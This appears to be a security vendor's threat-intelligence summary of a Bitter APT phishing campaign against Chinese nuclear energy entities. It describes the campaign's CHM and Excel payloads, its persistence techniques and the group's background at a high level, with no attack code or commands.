Verticals Targeted: Energy
A recent Bitter APT campaign targeted nuclear energy entities in China. The threat actors used multiple techniques to obtain access to the victim machine, maintain persistence, and download and execute next-stage payloads.
- Bitter APT recently launched an espionage campaign targeting energy sector entities in China.
- The threat actors used a phishing lure masquerading as a conference invitation from an embassy attache.
- The threat actors used both CHM and Excel payloads and employed multiple techniques in an attempt to evade detection and analysis.
Intezer recently reported on a Bitter APT campaign targeting nuclear energy entities in China. The threat actors engaged targets with a phishing campaign, with lures pretending to be from the Embassy of Kyrgyzstan in Beijing, inviting the recipient to join a conference related to their field. The emails have an attached RAR file containing a CHM or Excel payload. The email is meant to entice the intended victim into opening the RAR file. To add a sense of legitimacy to the email, the threat actors used the name of an actual attache at the embassy.
In the campaign, the threat actors used multiple malicious payloads, which were compressed into RAR files. The payloads are intended to maintain persistence in the victim network and download additional malware payloads.
The Excel payloads use an Equation Editor exploit to create two scheduled tasks: one used to download the next stage payload and another to attempt to execute the newly downloaded payload.
The CHM files, associated with Microsoft Compiled HTML Help, are used to execute arbitrary code and to create scheduled tasks. This allows the threat actor to obtain persistence on the victim machine, with very little user interaction required to initiate the infection. Additionally, the CHM files use LZX compression, allowing them to bypass static malware analysis if the file is not decompressed. One version of the CHM file creates a scheduled task that uses msiexec, a living-off-the-land binary (LoLBin), to execute a remote MSI payload hosted on the C2. Another version of the CHM payload performs similar activity using an encoded PowerShell command stage.
Who is Bitter APT?
Bitter APT is a threat actor group thought to operate out of South Asia. The group primarily engages in espionage campaigns. Bitter APT has previously targeted government and energy sector entities in Pakistan, China, Saudi Arabia, and Bangladesh.
PolySwarm has multiple samples associated with this campaign.
You can use the following CLI command to search for all Bitter APT samples in our portal:
$ polyswarm link list -f BitterAPT